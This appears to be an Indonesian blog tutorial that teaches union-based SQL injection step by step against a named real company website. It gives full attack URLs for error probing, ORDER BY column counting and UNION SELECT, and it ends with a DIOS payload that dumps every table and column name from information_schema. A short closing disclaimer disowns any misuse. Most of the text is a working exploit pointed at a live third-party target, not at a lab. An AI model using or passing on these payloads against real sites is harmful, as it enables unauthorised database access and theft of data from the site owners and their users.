1. Pilih website yang menurut mu vuln (memiliki celah) keamanan. Contoh target saya adalah https://www.granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1.
2. Kemudian berikan tanda ' diakhir url. Contohnya https://www.granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1'.
3. Kemudian nanti tanda ' akan berubah menjadi %27. Jika website nya memiliki celah keamanan, maka setelah diberikan tanda petik akan ada tulisan "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1".
4. Kemudian tambahkan "+order+by+1--+" di belakang url %27. Contohnya seperti ini : "https://www.granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+order+by+1--+".
5. Tinggal kita cari jumlah tabel nya, kita cari sampai error. Cara mencari nya cukup ubah angka 1.
6. Contoh saya mengubahnya menjadi https://www.granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+order+by+6--+. Jika hasilnya error seperti dibawah ini, berarti jumlah tabel nya hanya 5
7. Jika kita sudah mengetahui jumlah tabel nya, maka kita tinggal mencari sebuah angka lagi. Biasanya banyak yang menyebut nya angka ajaib. Cara mencari nya cukup ubah +order+by+6--+ menjadi +union+select+1,2,3,4,5--+. Mengapa kita menginputkan nya hanya sampai 5 ? Karena jumlah tabelnya adalah 5.
8. Jika sudah, maka tinggal kita cari sebuah angka yang terdapat dalam situs tersebut. Disini saya sudah menemukan angka ajaibnya adalah angka 5. Contohnya seperti dibawah ini
9. Jika sudah menemukan angka ajaibnya, tinggal kita dump database nya. Cara dump nya adalah dengan cara mengganti angka ajaibnya dengan dios. Diatas kita sudah mengetahui kalau angka ajaibnya adalah 5. Jadi kita ganti angka 5 pada https://www.granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+union+select+1,2,3,4,5-+ dengan sebuah Dios. Dios nya adalah seperti ini (Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)). Jika sudah kita ubah, maka hasilnya seperti ini https://www.granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+union+select+1,2,3,4,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))--+
10. Sudah selesai dan sekarang kita sudah bisa melihat database website nya. Contohnya seperti dibawah ini
Bagaimana ? Sulit atau mudahnya tergantung niat dari diri sendiri. Segala tindakan kejahatan dalam dunia maya bukan tanggung jawab saya. Jadi gunakanlah dengan sebijak bijaknya dan gunakan dalam hal kebaikan bukan kejahatan. Sekian dari saya, kurang lebihnya mohon maaf. Terimakasih.